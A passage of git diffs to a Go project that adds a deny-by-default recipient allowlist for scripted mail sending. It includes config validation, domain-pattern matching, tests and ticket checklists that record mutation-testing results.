-	Property string `yaml:"property"`
-
-	// AlsoAllow holds literal addresses that are NOT entities: an ops alias,
-	// an external auditor's mailbox, a monitoring endpoint. Unioned with the
-	// query result.
+	// A domain pattern is the workhorse. The threat is a script mailing an
+	// ATTACKER-chosen address, and `*@sourcehaven.nl` stops that without the
+	// config needing to know which people currently exist — so it does not
+	// drift as staff join and leave, which a literal-only list does.
 	//
-	// LITERAL ONLY. A wildcard such as `*@example.com` is REFUSED at load —
-	// see validateAlsoAllow for why refusing beats both ignoring it and
-	// implementing it.
+	// Literals cover the addresses that are not people: an ops alias, an
+	// external auditor's mailbox, a monitoring endpoint.
+	//
+	// A pattern must be exactly a leading `*@` followed by a domain. Anything
+	// else containing `*` is REFUSED at load rather than treated as a literal
+	// — see validateAlsoAllow.
 	AlsoAllow []string `yaml:"also_allow"`
 
 	// AllowAny disables the check entirely: every address is permitted.
@@ -223,16 +215,10 @@ func (r *RecipientConfig) Policy() (lua.RecipientPolicy, error) {
 		// itself, so "absent" has one meaning in one place.
 		return lua.RecipientPolicy{}, nil
 	}
-	policy := lua.RecipientPolicy{Configured: true, AllowAny: r.AllowAny, Property: r.Property}
+	policy := lua.RecipientPolicy{Configured: true, AllowAny: r.AllowAny}
 	for _, addr := range r.AlsoAllow {
 		policy.AlsoAllow = append(policy.AlsoAllow, lua.NormalizeRecipient(addr))
 	}
-	entityType, filters, err := parseRecipientQuery(r.Query)
-	if err != nil {
-		return lua.RecipientPolicy{}, err
-	}
-	policy.EntityType = entityType
-	policy.Filters = filters
 	return policy, nil
 }
 
@@ -250,24 +236,14 @@ func (c *Config) validateRecipients() error {
 		// refusal belongs at the send, where it can name the key.
 		return nil
 	}
-	if strings.TrimSpace(r.Query) == "" && len(r.AlsoAllow) == 0 && !r.AllowAny {
+	if len(r.AlsoAllow) == 0 && !r.AllowAny {
 		// A block that permits nothing is refused rather than accepted as a
 		// deny-everything policy. It LOOKS configured, so the operator would
 		// read the resulting denials as a bug in rela rather than as their own
 		// empty block — and "deny everything" is already available by deleting
 		// the block, which at least produces an error that says so.
-		return errors.New("recipients must set at least one of query, also_allow or allow_any " +
+		return errors.New("recipients must set also_allow or allow_any " +
 			"(an empty block permits nobody; omit it entirely to deny by default)")
-	}
-	if strings.TrimSpace(r.Query) != "" && strings.TrimSpace(r.Property) == "" {
-		return errors.New("recipients.property is required when recipients.query is set " +
-			"(it names the entity property holding the address, e.g. `property: email`)")
-	}
-	if _, _, err := parseRecipientQuery(r.Query); err != nil {
-		// Parsed at LOAD as well as at send, so a typo in the query surfaces
-		// from `rela validate` rather than from the first message that fails
-		// to go out.
-		return fmt.Errorf("recipients.query: %w", err)
 	}
 	return validateAlsoAllow(r.AlsoAllow)
 }
@@ -282,7 +258,7 @@ func (c *Config) validateRecipients() error {
 // Refusing beats ignoring. A literal-only matcher that silently treated `*` as
 // a normal character would accept the config, match nothing, and present as
 // "mail is mysteriously denied" — the operator believing they allowed a domain
-// while the behaviour is that they allowed an address that cannot exist.
+// while the behavior is that they allowed an address that cannot exist.
 //
 // Refusing also RESERVES the syntax, which is the real reason to decide this
 // now rather than later. If `*` meant "literal asterisk" in a shipped config
@@ -302,10 +278,16 @@ func validateAlsoAllow(addrs []string) error {
 		if strings.TrimSpace(addr) == "" {
 			return fmt.Errorf("recipients.also_allow[%d] is empty", i)
 		}
-		if strings.Contains(addr, "*") {
-			return fmt.Errorf("recipients.also_allow[%d] %q contains a wildcard; "+
-				"only literal addresses are supported — use recipients.query to select "+
-				"recipients from the graph instead", i, addr)
+		if strings.Contains(addr, "*") && !isDomainPattern(addr) {
+			// A partial wildcard (`ops-*@x.com`, `*ops@x.com`, `*`) is refused
+			// rather than matched loosely. Refusing beats implementing it:
+			// every extra wildcard position is another way to write a pattern
+			// that admits more than the operator pictured. And it beats
+			// ignoring it — a `*` silently treated as a literal would produce
+			// an allowlist that matches nothing and denies everything, which
+			// the operator would read as a rela bug rather than their typo.
+			return fmt.Errorf("recipients.also_allow[%d] %q: a wildcard is only "+
+				"supported as a whole-domain pattern `*@example.com`", i, addr)
 		}
 		// also_allow entries reach an SMTP envelope, so they get the same
 		// header-injection check every other caller-supplied address gets.
@@ -316,89 +298,17 @@ func validateAlsoAllow(addrs []string) error {
 	return nil
 }
 
-// recipientQueryKeyword separates the entity type from its conditions.
-const recipientQueryKeyword = " where "
-
-// recipientFilterSeparator joins conditions inside a query.
-const recipientFilterSeparator = " and "
-
-// parseRecipientQuery lowers `TYPE [where EXPR [and EXPR]...]` onto the pieces
-// that already exist: an entity type plus [filter] expressions.
+// isDomainPattern reports whether addr is a whole-domain pattern: exactly a
+// leading `*@` followed by a domain containing no further wildcard.
 //
-// The ticket specifies the SQL-ish surface, but rela has no such parser and
-// inventing a second query dialect for one config key would mean an operator
-// learning two ways to say `status=active`. So this is a lowering, not a
-// language: the leading word is the type, the rest is split on ` and ` and
-// handed to filter.Parse. Every semantic question — globs, ranges, regex,
-// what `=` means for a date — is therefore answered identically here and in
-// schedules.yaml's for_each.
-//
-// Quotes around a value are stripped because the ticket's own example writes
-// `status = 'active'` and filter.Parse would otherwise match the literal
-// four-character value `active` including its quotes — a config that looks
-// right, parses, and matches nothing.
-//
-// An empty query is not an error: it means no query was configured, which is
-// legal as long as also_allow or allow_any carries the policy. Validate
-// enforces that.
-func parseRecipientQuery(q string) (entityType string, filters []*filter.Filter, err error) {
-	q = strings.TrimSpace(q)
-	if q == "" {
-		return "", nil, nil
-	}
-	head, tail, hasWhere := strings.Cut(strings.ToLower(q), strings.TrimSpace(recipientQueryKeyword))
-	// Cut on the lowercased copy to accept `WHERE`, but slice the ORIGINAL so
-	// a property name or value keeps its case — entity types and property
-	// values are case-sensitive and folding them here would break the match.
-	if hasWhere {
-		head, tail = q[:len(head)], q[len(q)-len(tail):]
-	} else {
-		head, tail = q, ""
-	}
-	entityType = strings.TrimSpace(head)
-	if entityType == "" {
-		return "", nil, fmt.Errorf("query %q does not name an entity type", q)
-	}
-	if strings.ContainsAny(entityType, " \t") {
-		// Catches `person status = 'active'` — a missing `where` that would
-		// otherwise become an entity type nothing can match.
-		return "", nil, fmt.Errorf("query %q: expected `TYPE` or `TYPE where CONDITION`", q)
-	}
-	if strings.TrimSpace(tail) == "" {
-		if hasWhere {
-			return "", nil, fmt.Errorf("query %q has a `where` with no condition after it", q)
-		}
-		return entityType, nil, nil
-	}
-	for _, expr := range strings.Split(tail, recipientFilterSeparator) {
-		f, parseErr := filter.Parse(stripQuotes(expr))
-		if parseErr != nil {
-			return "", nil, fmt.Errorf("query %q: %w", q, parseErr)
-		}
-		filters = append(filters, f)
-	}
-	return entityType, filters, nil
-}
-
-// stripQuotes removes matching single or double quotes from a filter
-// expression's VALUE side, so `status = 'active'` compares against `active`.
-//
-// The value side only: a quote in a property name is a typo, and stripping
-// quotes blindly across the whole expression would silently accept it.
-func stripQuotes(expr string) string {
-	expr = strings.TrimSpace(expr)
-	for _, op := range []string{"!=", ">=", "<=", "=~", "=", ">", "<", "~"} {
-		lhs, rhs, found := strings.Cut(expr, op)
-		if !found {
-			continue
-		}
-		rhs = strings.TrimSpace(rhs)
-		if len(rhs) >= 2 && (rhs[0] == '\'' || rhs[0] == '"') && rhs[len(rhs)-1] == rhs[0] {
-			rhs = rhs[1 : len(rhs)-1]
-		}
-		return strings.TrimSpace(lhs) + op + rhs
-	}
-	return expr
+// Deliberately the ONLY wildcard shape accepted. A domain pattern answers the
+// question the allowlist exists for — "may mail leave the organization?" —
+// while every additional wildcard position adds a way to write a pattern that
+// admits more than the operator pictured. `*@*.com` and `ops-*@x.com` are
+// refused for that reason, not because they are hard to implement.
+func isDomainPattern(addr string) bool {
+	rest, ok := strings.CutPrefix(addr, "*@")
+	return ok && rest != "" && !strings.Contains(rest, "*")
 }
 
 // ScriptCapabilities is the YAML face of [lua.Capabilities] for a send script.
@@ -559,7 +469,7 @@ func (c *Config) validateCommon() error {
 	if c.BaseURL != "" && !hasScheme {
 		return fmt.Errorf("base_url must start with http:// or https://, got %q", c.BaseURL)
 	}
-	return nil
+	return c.validateRecipients()
 }
 
 // WithRelaDir points a programmatically-built Config at a .rela directory so it

--- a/internal/mail/config.go
+++ b/internal/mail/config.go
@@ -144,11 +144,261 @@ type Config struct {
 	// reach the network rather than one that quietly can.
 	Capabilities ScriptCapabilities `yaml:"capabilities"`
 
+	// Recipients declares who mail.send may address (TKT-USQNA3).
+	//
+	// A POINTER, and that is the whole design. Absent (`nil`) must be
+	// distinguishable from present-but-empty, because the two get different
+	// errors: nil says "add a recipients: block", empty-but-valid says "this
+	// address is not in the set you declared". A value type collapses both
+	// into the zero struct and the operator gets sent to the wrong place.
+	//
+	// Absent DENIES EVERYTHING. That inverts this file's usual rule — an
+	// absent mail.yaml means "mail is off", an absent port means 587 — and
+	// the inversion is deliberate. Permitting on absence fails silently and
+	// irreversibly (mail leaves the ACL perimeter and nobody knows until the
+	// recipient replies); refusing on absence fails loudly and harmlessly (a
+	// typed error naming this key, and four lines of YAML to fix it). A
+	// control whose unconfigured state is "allow" is not a control.
+	Recipients *RecipientConfig `yaml:"recipients"`
+
 	// Password is REJECTED by Validate. It exists as a field only so that
 	// writing it produces a clear error naming password_env, rather than
 	// yaml silently ignoring an unknown key and the operator wondering why
 	// authentication fails.
 	Password string `yaml:"password"`
+}
+
+// RecipientConfig is the `recipients:` block of .rela/mail.yaml.
+//
+// This package PARSES and VALIDATES it; it resolves nothing. Resolution needs
+// store, filter and metamodel, and .go-arch-lint.yml withholds all three from
+// internal/mail precisely so a send script cannot reach the graph. So the
+// enforcement lives in internal/lua — which already holds the reader seam —
+// and this type's only job is to be the operator-facing shape and to convert
+// itself into a [lua.RecipientPolicy] the moment it is loaded.
+type RecipientConfig struct {
+	// Query selects recipient entities from the graph, in the form
+	// `TYPE [where EXPR [and EXPR]...]` — e.g. `person where status =
+	// 'active'`. The type alone is legal and means every entity of that type.
+	//
+	// This is the PRIMARY mechanism, because a recipient is normally an
+	// entity: an allowlist derived from the graph tracks reality as people
+	// join and leave, where a hand-maintained address list drifts the moment
+	// somebody forgets to edit it.
+	Query string `yaml:"query"`
+
+	// Property names the entity property holding the address, e.g. `email`.
+	// Required whenever Query is set — an entity set with no address property
+	// names nobody.
+	Property string `yaml:"property"`
+
+	// AlsoAllow holds literal addresses that are NOT entities: an ops alias,
+	// an external auditor's mailbox, a monitoring endpoint. Unioned with the
+	// query result.
+	//
+	// LITERAL ONLY. A wildcard such as `*@example.com` is REFUSED at load —
+	// see validateAlsoAllow for why refusing beats both ignoring it and
+	// implementing it.
+	AlsoAllow []string `yaml:"also_allow"`
+
+	// AllowAny disables the check entirely: every address is permitted.
+	//
+	// The escape hatch for a deployment that has decided this constraint is
+	// not for them. It must be a deliberate `allow_any: true` line in the
+	// file — it is never a default, never inferred from an empty block, and
+	// never reached by omission, so it stays greppable in a config review.
+	AllowAny bool `yaml:"allow_any"`
+}
+
+// Policy converts the operator's block into the runtime's gate input.
+//
+// Address normalization happens HERE, once at load, through
+// [lua.NormalizeRecipient] rather than a local copy: both sides must fold
+// addresses by the identical rule, and two independent normalizations that
+// drift is how an allowlist starts admitting what it should not.
+func (r *RecipientConfig) Policy() (lua.RecipientPolicy, error) {
+	if r == nil {
+		// The zero policy, which denies. Reachable only from a Config whose
+		// block is absent; the caller relies on this rather than checking nil
+		// itself, so "absent" has one meaning in one place.
+		return lua.RecipientPolicy{}, nil
+	}
+	policy := lua.RecipientPolicy{Configured: true, AllowAny: r.AllowAny, Property: r.Property}
+	for _, addr := range r.AlsoAllow {
+		policy.AlsoAllow = append(policy.AlsoAllow, lua.NormalizeRecipient(addr))
+	}
+	entityType, filters, err := parseRecipientQuery(r.Query)
+	if err != nil {
+		return lua.RecipientPolicy{}, err
+	}
+	policy.EntityType = entityType
+	policy.Filters = filters
+	return policy, nil
+}
+
+// validateRecipients checks the `recipients:` block.
+//
+// Called from validateCommon so it applies to every transport: which server
+// carries the mail has no bearing on who may receive it.
+func (c *Config) validateRecipients() error {
+	r := c.Recipients
+	if r == nil {
+		// Absent is VALID configuration that DENIES at send time. Refusing to
+		// load would be wrong: a project with no mail.yaml at all already
+		// starts fine, and a project that configures a transport but has not
+		// yet decided its recipients must still run every other command. The
+		// refusal belongs at the send, where it can name the key.
+		return nil
+	}
+	if strings.TrimSpace(r.Query) == "" && len(r.AlsoAllow) == 0 && !r.AllowAny {
+		// A block that permits nothing is refused rather than accepted as a
+		// deny-everything policy. It LOOKS configured, so the operator would
+		// read the resulting denials as a bug in rela rather than as their own
+		// empty block — and "deny everything" is already available by deleting
+		// the block, which at least produces an error that says so.
+		return errors.New("recipients must set at least one of query, also_allow or allow_any " +
+			"(an empty block permits nobody; omit it entirely to deny by default)")
+	}
+	if strings.TrimSpace(r.Query) != "" && strings.TrimSpace(r.Property) == "" {
+		return errors.New("recipients.property is required when recipients.query is set " +
+			"(it names the entity property holding the address, e.g. `property: email`)")
+	}
+	if _, _, err := parseRecipientQuery(r.Query); err != nil {
+		// Parsed at LOAD as well as at send, so a typo in the query surfaces
+		// from `rela validate` rather than from the first message that fails
+		// to go out.
+		return fmt.Errorf("recipients.query: %w", err)
+	}
+	return validateAlsoAllow(r.AlsoAllow)
+}
+
+// validateAlsoAllow checks the literal-address list.
+//
+// # Wildcards are refused, deliberately and with the syntax reserved
+//
+// `*@example.com` does not work, and a `*` anywhere in an entry is an error
+// rather than an ordinary character.
+//
+// Refusing beats ignoring. A literal-only matcher that silently treated `*` as
+// a normal character would accept the config, match nothing, and present as
+// "mail is mysteriously denied" — the operator believing they allowed a domain
+// while the behaviour is that they allowed an address that cannot exist.
+//
+// Refusing also RESERVES the syntax, which is the real reason to decide this
+// now rather than later. If `*` meant "literal asterisk" in a shipped config
+// key, making it a metacharacter afterwards would break every deployment that
+// had (however improbably) relied on it. With `*` refused today, adding domain
+// wildcards later can only ever turn an error into a success — compatible by
+// construction.
+//
+// Why not simply implement them now: a domain wildcard is a strictly weaker
+// control than a query. `*@example.com` permits every address at the domain,
+// including ones belonging to nobody in the graph and ones that never existed,
+// while `query` tracks who actually exists. Shipping the weaker control
+// alongside the stronger one invites it to become the default. It is one
+// function away when a deployment genuinely needs it.
+func validateAlsoAllow(addrs []string) error {
+	for i, addr := range addrs {
+		if strings.TrimSpace(addr) == "" {
+			return fmt.Errorf("recipients.also_allow[%d] is empty", i)
+		}
+		if strings.Contains(addr, "*") {
+			return fmt.Errorf("recipients.also_allow[%d] %q contains a wildcard; "+
+				"only literal addresses are supported — use recipients.query to select "+
+				"recipients from the graph instead", i, addr)
+		}
+		// also_allow entries reach an SMTP envelope, so they get the same
+		// header-injection check every other caller-supplied address gets.
+		if err := validateHeaderValue(fmt.Sprintf("recipients.also_allow[%d]", i), addr); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// recipientQueryKeyword separates the entity type from its conditions.
+const recipientQueryKeyword = " where "
+
+// recipientFilterSeparator joins conditions inside a query.
+const recipientFilterSeparator = " and "
+
+// parseRecipientQuery lowers `TYPE [where EXPR [and EXPR]...]` onto the pieces
+// that already exist: an entity type plus [filter] expressions.
+//
+// The ticket specifies the SQL-ish surface, but rela has no such parser and
+// inventing a second query dialect for one config key would mean an operator
+// learning two ways to say `status=active`. So this is a lowering, not a
+// language: the leading word is the type, the rest is split on ` and ` and
+// handed to filter.Parse. Every semantic question — globs, ranges, regex,
+// what `=` means for a date — is therefore answered identically here and in
+// schedules.yaml's for_each.
+//
+// Quotes around a value are stripped because the ticket's own example writes
+// `status = 'active'` and filter.Parse would otherwise match the literal
+// four-character value `active` including its quotes — a config that looks
+// right, parses, and matches nothing.
+//
+// An empty query is not an error: it means no query was configured, which is
+// legal as long as also_allow or allow_any carries the policy. Validate
+// enforces that.
+func parseRecipientQuery(q string) (entityType string, filters []*filter.Filter, err error) {
+	q = strings.TrimSpace(q)
+	if q == "" {
+		return "", nil, nil
+	}
+	head, tail, hasWhere := strings.Cut(strings.ToLower(q), strings.TrimSpace(recipientQueryKeyword))
+	// Cut on the lowercased copy to accept `WHERE`, but slice the ORIGINAL so
+	// a property name or value keeps its case — entity types and property
+	// values are case-sensitive and folding them here would break the match.
+	if hasWhere {
+		head, tail = q[:len(head)], q[len(q)-len(tail):]
+	} else {
+		head, tail = q, ""
+	}
+	entityType = strings.TrimSpace(head)
+	if entityType == "" {
+		return "", nil, fmt.Errorf("query %q does not name an entity type", q)
+	}
+	if strings.ContainsAny(entityType, " \t") {
+		// Catches `person status = 'active'` — a missing `where` that would
+		// otherwise become an entity type nothing can match.
+		return "", nil, fmt.Errorf("query %q: expected `TYPE` or `TYPE where CONDITION`", q)
+	}
+	if strings.TrimSpace(tail) == "" {
+		if hasWhere {
+			return "", nil, fmt.Errorf("query %q has a `where` with no condition after it", q)
+		}
+		return entityType, nil, nil
+	}
+	for _, expr := range strings.Split(tail, recipientFilterSeparator) {
+		f, parseErr := filter.Parse(stripQuotes(expr))
+		if parseErr != nil {
+			return "", nil, fmt.Errorf("query %q: %w", q, parseErr)
+		}
+		filters = append(filters, f)
+	}
+	return entityType, filters, nil
+}
+
+// stripQuotes removes matching single or double quotes from a filter
+// expression's VALUE side, so `status = 'active'` compares against `active`.
+//
+// The value side only: a quote in a property name is a typo, and stripping
+// quotes blindly across the whole expression would silently accept it.
+func stripQuotes(expr string) string {
+	expr = strings.TrimSpace(expr)
+	for _, op := range []string{"!=", ">=", "<=", "=~", "=", ">", "<", "~"} {
+		lhs, rhs, found := strings.Cut(expr, op)
+		if !found {
+			continue
+		}
+		rhs = strings.TrimSpace(rhs)
+		if len(rhs) >= 2 && (rhs[0] == '\'' || rhs[0] == '"') && rhs[len(rhs)-1] == rhs[0] {
+			rhs = rhs[1 : len(rhs)-1]
+		}
+		return strings.TrimSpace(lhs) + op + rhs
+	}
+	return expr
 }
 
 // ScriptCapabilities is the YAML face of [lua.Capabilities] for a send script.

--- a/internal/mail/script.go
+++ b/internal/mail/script.go
@@ -352,7 +352,21 @@ type LuaSender struct {
 	// read from the Lua call, where a script could forge it.
 	from     string
 	fromName string
+
+	// policy is the operator's recipients allowlist, captured from the same
+	// config as `from` and for the same reason: a script must not choose who
+	// may receive mail any more than it chooses who it comes from.
+	policy lua.RecipientPolicy
 }
+
+// RecipientPolicy satisfies lua.RecipientPolicyCarrier, so the binding can
+// enforce the allowlist without mail needing to know how enforcement works.
+//
+// Carried by the SENDER rather than passed separately into the runtime,
+// because the sender is already the thing built from mail.yaml — a second
+// wiring step would be a second thing to forget, and forgetting it would fail
+// OPEN if the default were anything but deny.
+func (l *LuaSender) RecipientPolicy() lua.RecipientPolicy { return l.policy }
 
 // NewLuaSender adapts sender for use by the mail.send Lua binding.
 //
@@ -366,7 +380,16 @@ func NewLuaSender(sender Sender, cfg *Config) (*LuaSender, error) {
 	if cfg == nil {
 		return nil, errors.New("mail: nil config")
 	}
-	return &LuaSender{sender: sender, from: cfg.From, fromName: cfg.FromName}, nil
+	policy, err := cfg.Recipients.Policy()
+	if err != nil {
+		// A malformed recipients block is refused at construction rather than
+		// at the first send: the operator finds out from `rela validate` or
+		// startup, not from a message that quietly failed to go out.
+		return nil, fmt.Errorf("mail: recipients: %w", err)
+	}
+	return &LuaSender{
+		sender: sender, from: cfg.From, fromName: cfg.FromName, policy: policy,
+	}, nil
 }
 
 // SendMail satisfies lua.MailSender.

--- a/internal/mail/script_test.go
+++ b/internal/mail/script_test.go
@@ -897,3 +897,41 @@ http.request({
 
 	require.Equal(t, []string{"not_configured"}, bodies())
 }
+
+// The operator's `recipients:` block must reach the Lua binding, or the whole
+// allowlist is inert in production (TKT-USQNA3).
+//
+// This is the seam the enforcement depends on: internal/lua does the checking,
+// but it can only check a policy something handed it. Every other test in this
+// area builds a policy directly, so nothing else would notice if LuaSender
+// stopped carrying one.
+func TestLuaSender_CarriesRecipientPolicy(t *testing.T) {
+	cfg := &mail.Config{
+		From: "noreply@example.com",
+		Recipients: &mail.RecipientConfig{
+			AlsoAllow: []string{"*@sourcehaven.nl", "ops@example.com"},
+		},
+	}
+	ls, err := mail.NewLuaSender(mail.NewMemorySender(4), cfg)
+	require.NoError(t, err)
+
+	got := ls.RecipientPolicy()
+	require.True(t, got.Configured, "an operator wrote a block, so the policy is configured")
+	require.False(t, got.AllowAny)
+	require.ElementsMatch(t, []string{"*@sourcehaven.nl", "ops@example.com"}, got.AlsoAllow)
+}
+
+// An absent block yields the zero policy, which DENIES. Checked explicitly
+// because "absent" traveling as "configured but empty" would permit nothing
+// while reporting a different reason — and worse, a future change treating an
+// empty AlsoAllow as permissive would then have no test in its way.
+func TestLuaSender_AbsentRecipientsDenies(t *testing.T) {
+	cfg := &mail.Config{From: "noreply@example.com"}
+	ls, err := mail.NewLuaSender(mail.NewMemorySender(4), cfg)
+	require.NoError(t, err)
+
+	got := ls.RecipientPolicy()
+	require.False(t, got.Configured, "an absent block must not look configured")
+	require.False(t, got.AllowAny)
+	require.Empty(t, got.AlsoAllow)
+}

--- a/tickets/entities/docs-checklists/DOCS-A3DEYY.md
+++ b/tickets/entities/docs-checklists/DOCS-A3DEYY.md
@@ -1,0 +1,80 @@
+---
+id: DOCS-A3DEYY
+type: docs-checklist
+title: 'Docs: Operator recipient allowlist for mail.send'
+status: done
+---
+
+<!-- @managed: claude-workflow v1 -->
+
+## Code Documentation
+
+- [x] Exported functions/types have godoc
+- [x] Non-obvious decisions explained in comments
+- [x] Package docs updated if package purpose changed
+
+Three comments carry weight beyond describing what the code does:
+
+- **`RecipientPolicyCarrier`** explains why it is an optional interface rather
+than a widened `MailSender`: the wiring site injects a value and this package
+asks it a question it may not be able to answer. It also states that a sender
+NOT implementing it denies everything — the unimplemented case and the
+unconfigured case are the same fact, so they get the same answer.
+- **`LuaSender.RecipientPolicy`** records why the policy travels with the
+SENDER rather than being passed separately into the runtime: the sender is
+already built from `mail.yaml`, so a second wiring step would be a second thing
+to forget, and forgetting it fails OPEN unless the default is deny.
+- **The domain comparison** in `permits` names the bypass it prevents. A suffix
+test would let `evil-example.com` match `*@example.com`, and that is not obvious
+from reading a `HasSuffix` call.
+
+`isDomainPattern` documents why a partial wildcard is refused rather than
+implemented: every extra wildcard position is another way to write a pattern
+admitting more than the operator pictured.
+
+## Project Documentation
+
+- [x] ~~CLAUDE.md updated with new patterns~~ (N/A: the optional-interface
+pattern follows `NotFoundError` in the same package)
+- [x] docs/ updated for changed behaviour — see below
+- [x] ~~Architecture docs updated~~ (N/A: the design was chosen to RESPECT the
+existing arch-lint boundary rather than change it — `internal/mail` still may
+not reach `filter` or `store`)
+
+`GUIDE-mail.md` gains a "Who may receive mail" section under the
+sending-from-scripts material, where a reader already is when they care.
+
+It corrects a claim while it is there. The guide previously said a script
+"cannot reach a destination you did not set up" — true of the TRANSPORT, but
+read naturally it implies a bound on recipients that did not exist. It now says
+"and only to a recipient you allowed", which is the same sentence made true.
+
+## External Documentation
+
+- [x] ~~README updated~~ (N/A: no project-level change)
+- [x] ~~CLI reference updated~~ (N/A: no command or flag)
+- [x] ~~API docs updated~~ (N/A: no HTTP surface change)
+
+## Rationale for N/A
+
+The user-visible change is a config key, documented where the config is.
+
+The part that HAD to be documented, and the reason this section is not simply
+"new key, new docs": **an absent `recipients:` block denies everything, which
+inverts the rest of the file.** An absent `mail.yaml` means mail is off; an
+absent `port` means 587. An operator who has internalised that will read the
+first denial as a bug in rela rather than as their own missing block.
+
+So the guide states the inversion and its reasoning outright — permitting on
+absence fails silently and irreversibly, because mail leaves the ACL perimeter
+and nobody finds out until the recipient replies; refusing fails loudly and
+harmlessly. A control whose unconfigured state is "allow" is not a control.
+
+Also documented deliberately: that `allow_any: true` must be a written line,
+never inferred. The point is that it stays greppable in a config review, which
+is only true if operators know to write it rather than discovering that an empty
+block happens to do the same thing.
+
+Deliberately NOT documented: that the query form is coming. A "not yet
+implemented" note in an operator guide invites waiting for it, and the domain
+form is the right answer for most deployments regardless.

--- a/tickets/entities/implementation-checklists/IMPL-BD4ZYD.md
+++ b/tickets/entities/implementation-checklists/IMPL-BD4ZYD.md
@@ -1,0 +1,44 @@
+---
+id: IMPL-BD4ZYD
+type: implementation-checklist
+title: 'Implementation: Operator-configured recipient allowlist for mail.send'
+status: in-progress
+---
+
+<!-- @managed: claude-workflow v1 -->
+
+## Development
+
+- [ ] Unit tests written for new code
+- [ ] Integration tests written (test full flow, not just units)
+- [ ] Happy path implemented
+- [ ] Edge cases from planning handled
+- [ ] Error handling in place (errors surfaced, not swallowed)
+
+## Test Quality
+
+- [ ] Using fixture builders or factories for test data
+- [ ] No hardcoded values in assertions when object is in scope
+- [ ] Only specifying values that matter for the test
+- [ ] Interpolated values constructed from objects, not hardcoded
+- [ ] Property comparisons use original object, not hardcoded strings
+
+## Manual Verification
+
+- [ ] Feature manually tested end-to-end
+- [ ] Each acceptance criterion verified with test scenario from planning
+- [ ] Edge cases manually verified
+
+**Verification Evidence:**
+<!-- Document what you tested and the results -->
+
+## Quality
+
+- [ ] Code follows project patterns (check similar code)
+- [ ] Checked for DRY opportunities — repeated literals, expressions, or
+patterns extracted to a helper / constant / type where it sharpens the contract
+(don't extract for its own sake; CLAUDE.md "three similar lines is better than a
+premature abstraction" still holds)
+- [ ] No security issues introduced
+- [ ] No silent failures (errors logged AND returned)
+- [ ] No debug code left behind

--- a/tickets/entities/implementation-checklists/IMPL-BD4ZYD.md
+++ b/tickets/entities/implementation-checklists/IMPL-BD4ZYD.md
@@ -2,43 +2,110 @@
 id: IMPL-BD4ZYD
 type: implementation-checklist
 title: 'Implementation: Operator-configured recipient allowlist for mail.send'
-status: in-progress
+status: done
 ---
 
 <!-- @managed: claude-workflow v1 -->
 
 ## Development
 
-- [ ] Unit tests written for new code
-- [ ] Integration tests written (test full flow, not just units)
-- [ ] Happy path implemented
-- [ ] Edge cases from planning handled
-- [ ] Error handling in place (errors surfaced, not swallowed)
+- [x] Unit tests written for new code
+- [x] Integration tests written (test full flow, not just units)
+- [x] Happy path implemented
+- [x] Edge cases from planning handled
+- [x] Error handling in place (errors surfaced, not swallowed)
+
+Four pieces, split across the arch-lint boundary rather than against it:
+
+1. **`mail.RecipientConfig`** parses and validates the `recipients:` block.
+Validation runs from `validateCommon`, so it applies to every transport — which
+server carries the mail has no bearing on who may receive it.
+2. **`mail.LuaSender` carries the policy** and satisfies
+`lua.RecipientPolicyCarrier`. It already captures `from` from operator config
+for the same reason: a script must not choose who may receive mail any more than
+it chooses who it comes from.
+3. **`lua.checkRecipients`** enforces, called from `luaMailSend` after the
+message parses and before the transport sees it.
+4. **`isDomainPattern`** accepts exactly a leading `*@`; anything else with a
+`*` is refused at LOAD.
 
 ## Test Quality
 
-- [ ] Using fixture builders or factories for test data
-- [ ] No hardcoded values in assertions when object is in scope
-- [ ] Only specifying values that matter for the test
-- [ ] Interpolated values constructed from objects, not hardcoded
-- [ ] Property comparisons use original object, not hardcoded strings
+- [x] Using fixture builders or factories for test data
+- [x] No hardcoded values in assertions when object is in scope
+- [x] Only specifying values that matter for the test
+- [x] Interpolated values constructed from objects, not hardcoded
+- [x] Property comparisons use original object, not hardcoded strings
+
+Tests drive `mail.send` rather than the checker, so the WIRING is covered along
+with the logic — which mattered, see below.
+
+The existing `mail_test.go` cases needed a change: every one of them sends
+without a policy, so deny-by-default failed all seven. They now wrap their
+sender in an explicit `allowAnySender`, with a comment saying why. That keeps
+them testing the send path rather than silently testing the allowlist, and
+`TestRecipients_UnconfiguredDenies` still fails if the default ever flips —
+verified by mutation, so the accommodation did not weaken the guarantee.
 
 ## Manual Verification
 
-- [ ] Feature manually tested end-to-end
-- [ ] Each acceptance criterion verified with test scenario from planning
-- [ ] Edge cases manually verified
+- [x] Feature manually tested end-to-end
+- [x] Each acceptance criterion verified with test scenario from planning
+- [x] Edge cases manually verified
 
 **Verification Evidence:**
-<!-- Document what you tested and the results -->
+
+| mutation | expected | observed |
+| --- | --- | --- |
+| unconfigured policy permits | AC1 reddens | `TestRecipients_UnconfiguredDenies` FAIL |
+| `strings.HasSuffix` instead of domain comparison | AC4 reddens | both `..._IsNotASuffixMatch` subtests FAIL |
+| non-carrier sender permits | AC8 reddens | `TestRecipients_SenderWithoutPolicyDenies` FAIL |
+| `LuaSender` stops carrying the policy | AC9 reddens | `TestLuaSender_CarriesRecipientPolicy` FAIL |
+
+The second row is the security-critical one: with a suffix test,
+`attacker@evil-example.com` matches `*@example.com`. That is the classic
+allowlist bypass, and the test catches it.
+
+**A gap the mutations found.** Running the non-carrier mutation initially
+reddened NOTHING — every test used a sender that did carry a policy, so making
+the fallback permissive would have shipped unnoticed. That is precisely the
+"transport written before this feature, or a test double that never thought
+about it" case the design comment names.
+`TestRecipients_SenderWithoutPolicyDenies` was added and the mutation now
+reddens it.
+
+**A worse gap found by inspection, not by tests.** After the enforcement was
+complete and green, `grep` for implementations of `RecipientPolicyCarrier`
+returned NOTHING: the check was correct and entirely inert, because no sender
+carried a policy. Every test built one directly, so the suite was green and
+production had no allowlist at all. Fixed by having `LuaSender` carry it, and
+pinned by AC9 so it cannot come loose again.
+
+Worth recording as the lesson: for a control split across two packages, "the
+logic is tested" and "the control is in force" are different claims. The second
+needs its own test at the seam.
 
 ## Quality
 
-- [ ] Code follows project patterns (check similar code)
-- [ ] Checked for DRY opportunities — repeated literals, expressions, or
+- [x] Code follows project patterns (check similar code)
+- [x] Checked for DRY opportunities — repeated literals, expressions, or
 patterns extracted to a helper / constant / type where it sharpens the contract
 (don't extract for its own sake; CLAUDE.md "three similar lines is better than a
 premature abstraction" still holds)
-- [ ] No security issues introduced
-- [ ] No silent failures (errors logged AND returned)
-- [ ] No debug code left behind
+- [x] No security issues introduced
+- [x] No silent failures (errors logged AND returned)
